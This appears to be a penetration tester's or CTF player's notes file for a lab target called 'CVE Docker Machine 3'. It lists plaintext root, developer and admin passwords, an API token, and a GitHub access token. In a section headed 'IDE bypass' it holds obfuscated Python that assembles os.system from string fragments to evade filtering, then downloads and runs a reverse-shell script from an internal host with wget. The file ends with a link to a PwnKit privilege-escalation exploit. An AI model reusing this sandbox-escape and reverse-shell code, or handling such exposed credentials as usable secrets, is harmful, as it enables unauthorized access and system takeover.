________________________________________________________
CVE Docker Machine 3 
users:
root:sPPAj@8e]R&xb}/s
developer:sczJz@22@ZkA*hAK
________________________________________________________
IDE Docker user:
networkadmin:q#f&EeM?Q+cpJwU7FMw5
________________________________________________________
Restful API token
token:
administrator:WAT@Str0ngPass

URL: http://192.168.5.10:5000/employees/carl?token=

URL: http://192.168.5.10:5000/employees/dev?token=
________________________________________________________
to git clone private repo 
github_token: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
________________________________________________________
**IDE website django super user
superadminsea:pBPqM$$JQQK68Sh
___

**IDE normal use:
dev_user:DE3v3l0perISR3@L!!
___
** IDE bypass
c1 = 'o'
c2 = 's'
c3 = c1 + c2
c4 = "import {}".format(c3)
exec(c4)
s1 = '.sy'
s2 = 'st'
s3 = 'em'
s4 = s1+s2+s3
fullcommand = "{}{}('wget http://192.168.0.192:9002/rev.sh && bash rev.sh')".format(c3,s4)
exec(fullcommand)

________________________________________________________
exploitation for PWNkit
https://github.com/chenaotian/CVE-2021-4034

